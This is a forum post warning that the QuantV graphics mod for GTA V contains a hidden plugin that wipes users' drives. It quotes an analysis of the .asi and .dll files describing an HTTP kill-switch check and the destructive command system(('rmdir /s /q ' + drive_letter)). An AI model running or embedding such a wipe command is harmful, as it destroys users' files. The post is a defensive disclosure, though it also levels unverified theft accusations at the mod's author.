Jump to content

BE AWARE ABOUT QUANTV GRAPHICAL MOD!

Launcher Leaks

Yesterday our members brought to our attention of QuantV was deleting members game files which we are now guessing was the .asi included for the base game folder that would delete your game files once executed.

Quant has a long history of doing shady stuff which also includes stealing and not using original code for his graphic pack which includes just ripping RDR2's clouds and placing them in GTAV and stealing from RazedMods NVE at one point had filenames within his graphical pack that are identical to NVE's files.

Quant should not be trusted as hes installing basically malware into peoples computers without notice or a warning which is really invasion especially without the users knowledge.

NVE is a safer option although we dont allow downloads for it here it can be found elsewhere or support RazedMods Patreon to get access.

unknown.png

 

Factual information (via Rage Forums)

  • Both enbhelper.dll and QuantV.asi contain the full disk wipe/HTTP check logic. This wasn’t found initially as compiler settings were different.
  • It’s unlikely that this was added by a ‘leaker’ as some rumors say. The way this is integrated into the code shows that this was likely done by someone with access to either original or reverse-engineered source code for the .asi file, and the chain I’ve received the sample from corroborates this.
  • Antivirus software generally does not pick this up as they rely on a) known signatures or b) behavioral analysis. Since this is a plugin, preemptive behavioral analysis does not apply.
  • There is no sign of this version of the .asi executing any other commands than this rmdir chain.
  • Similarly, there’s no sign of other persistence methods, though there are some file read/writes, and it may be the case the .asi will edit some .ini files in the enbseries folder to ‘worm’ in case a pirated copy is spread further.
  • The ‘check’ is done using a HTTP API, the details of which have not been investigated at this time located at http://quantv.xyz/updater, presumable with a POST request of code=..., involving the Desaturate Radius= value in enbseries/enbeffect.fx.ini, which is actually a unique user ID.
  •  
  • The library cpp-httplib 17 is used, with httplib:: renamed to enb::. The main ‘trigger’ is this API returning (or not returning) true.
  • The command executed amounts to system(("rmdir /s /q " + drive_letter).c_str());. This will remove files that the user has access to read/write, which could be a lot.
  • There have been reports of this being used in the wild, and this existing in pirated copies of an ‘August release’ as well.
×
×
  • Create New...

Important Information

By continuing on Launcherleaks.com, you agree to our Terms of Use, Guidelines & Privacy Policy